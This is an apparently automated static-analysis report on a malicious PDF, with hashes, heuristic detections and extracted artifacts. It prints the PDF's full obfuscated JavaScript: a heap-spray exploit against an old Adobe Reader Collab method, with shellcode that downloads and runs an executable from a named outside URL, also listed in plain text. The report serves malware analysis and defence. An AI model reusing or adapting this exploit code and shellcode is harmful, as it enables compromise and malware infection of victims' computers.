Malicious PDF — malware analysis report

Static analysis result for SHA-256 42b5b174d6769279…

MALICIOUS

PDF

2.8 KB · Created: 2008-08-06 01:42:27 · Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) · First seen: 2026-05-08
MD5: 91acd9adfdd063be4fe3efec24917bea SHA-1: d1158fd63d5f0020e8e5c926abcffb2e7974bf4f SHA-256: 42b5b174d67692792e359ea710e267f761b1dfbccd6b5451a0000a4091b1aa8b
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The JavaScript stream is obfuscated, as suggested by the PDF_UNESCAPE firing and the 'Script obfuscation indicators' signal. The primary IOC is the extracted JavaScript file itself. The obfuscated nature of the script prevents a more detailed analysis of its specific actions, but its presence within a PDF strongly suggests an attempt to deliver a malicious payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 7

  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
       var ZwyjxfBEVj4WzI = 0x0c0c0c0c;
       var YD5DH3Hbh = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u7 …
       var GKE2YjkbGktlF = 0x400000;
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) referenced each URL.
    URL http://buterik.com/123/load.exe Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x36A 2918 bytes
SHA-256: a007b6a55e9cac12e5223a4f6a8954606e9bca8d191a57700ad06f95a3a0f60a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function xAWZdld86Pbw() {	var gF07YAiQwEf = new Array(); 
		function V0NLFh8(mh4zKA5, Z2hRGqYp2GFx) { 
			while (mh4zKA5.length*2<Z2hRGqYp2GFx){mh4zKA5 += mh4zKA5;} 
			mh4zKA5 = mh4zKA5.substring(0,Z2hRGqYp2GFx/2);
			return mh4zKA5; 
		}

		function Lai5x5JeCjstnr() { 
			var ZwyjxfBEVj4WzI = 0x0c0c0c0c; 
			var YD5DH3Hbh = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u7941%u0B27%u613E%u86F9%u1111%u9811%u0D54%uD49A%uD192%u9841%u3154%uEE79%u1111%u4111%u549A%u7B05%u4813%u449A%uF909%u1170%u1111%u5412%uD631%u4D11%u3F6F%uD674%u1551%u7469%u1111%u64EE%u9A31%u1D54%u107B%u9A48%u0944%u51F9%u1111%u7B11%u4916%u5412%u2235%u42CA%uEE42%u3164%u4241%u549A%u7B0D%u4814%u449A%uF909%u1132%u1111%u117B%u64EE%u9A31%u1954%u137B%u9A48%u0944%u01F9%u1111%u7B11%u9AEE%u0154%u107B%u9A48%u0944%u11F9%u1111%u5011%u434A%uF012%uF012%uF012%uF012%uFD92%u4B15%u9A42%uF3CB%u43E6%uF1EE%u9A44%u9AFD%u196C%u4C9A%u471D%u629A%u9A2D%u0F65%u1269%u47E2%u679A%u1231%u22E2%u58D8%uBC50%uD212%u2247%u1EE7%u01AF%uE32B%u1965%uDFD0%u121C%u51E3%uE0FA%uEF2A%u644F%u4BF4%uFA9A%u4B9A%u1235%u77CC%u1D9A%u9A5A%u0D4B%uCC12%u159A%u129A%u4FD4%uD34C%u1119%uE5F9%uEEEF%u44EE%u5D43%u5E5C%u115F%u7468%u7074%u2F3A%u622F%u7475%u7265%u6B69%u632E%u6D6F%u312F%u3332%u6C2F%u616F%u2E64%u7865%u0065");
			var GKE2YjkbGktlF = 0x400000;
			var JSPsk1ZDL9bTZ = YD5DH3Hbh.length * 2;
			var Z2hRGqYp2GFx = GKE2YjkbGktlF - (JSPsk1ZDL9bTZ+0x38);
			var mh4zKA5 = unescape("%u9090%u9090");
			mh4zKA5 = V0NLFh8(mh4zKA5, Z2hRGqYp2GFx);
			var VwkOGyPoiA = (ZwyjxfBEVj4WzI - 0x400000)/GKE2YjkbGktlF;
			
			for (var dZN8Qa6M=0;dZN8Qa6M<VwkOGyPoiA;dZN8Qa6M++) { 
				gF07YAiQwEf[dZN8Qa6M] = mh4zKA5 + YD5DH3Hbh;
			}
		}

		function KvJkBRadqSNr2b() {
			var jCgkOF = app.viewerVersion.toString();
			jCgkOF = jCgkOF.replace(/\D/g,"");
			var sdw84l = new Array(jCgkOF.charAt(0),jCgkOF.charAt(1),jCgkOF.charAt(2));
			var yrpBXZZmGjQCqU = "c8o8l5l555e2c424t234534E6ma45678il31In1f3457o";
			if ((sdw84l[0] == 8 &&
			((sdw84l[1] == 1 && sdw84l[2] < 2) || sdw84l[1] < 1)) || 
			(sdw84l[0] == 7 && sdw84l[1] < 1) || 
			(sdw84l[0] < 7)) {
			        var iymdMe = Collab;
				Lai5x5JeCjstnr();
				var xBpAVaL = unescape("%u0c0c%u0c0c");
				var wj0Xtf8EbIDO = "c24ol2la572bS8to2445r5e00";
				while(xBpAVaL.length < 44952) xBpAVaL += xBpAVaL;
				this[wj0Xtf8EbIDO.replace(new RegExp(/\d/g),"")] = iymdMe[yrpBXZZmGjQCqU.replace(new RegExp(/\d/g),"")](                  {subj:            "",        msg:              xBpAVaL});
			} 
		}
		KvJkBRadqSNr2b();}
javascript_obj0013_001_shellcode_00.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 13 at offset 0x36A 444 bytes
SHA-256: bcb2470f54ff4d180f2f1d8ee994554fbbb7541e67bae743de98e7713ac34a25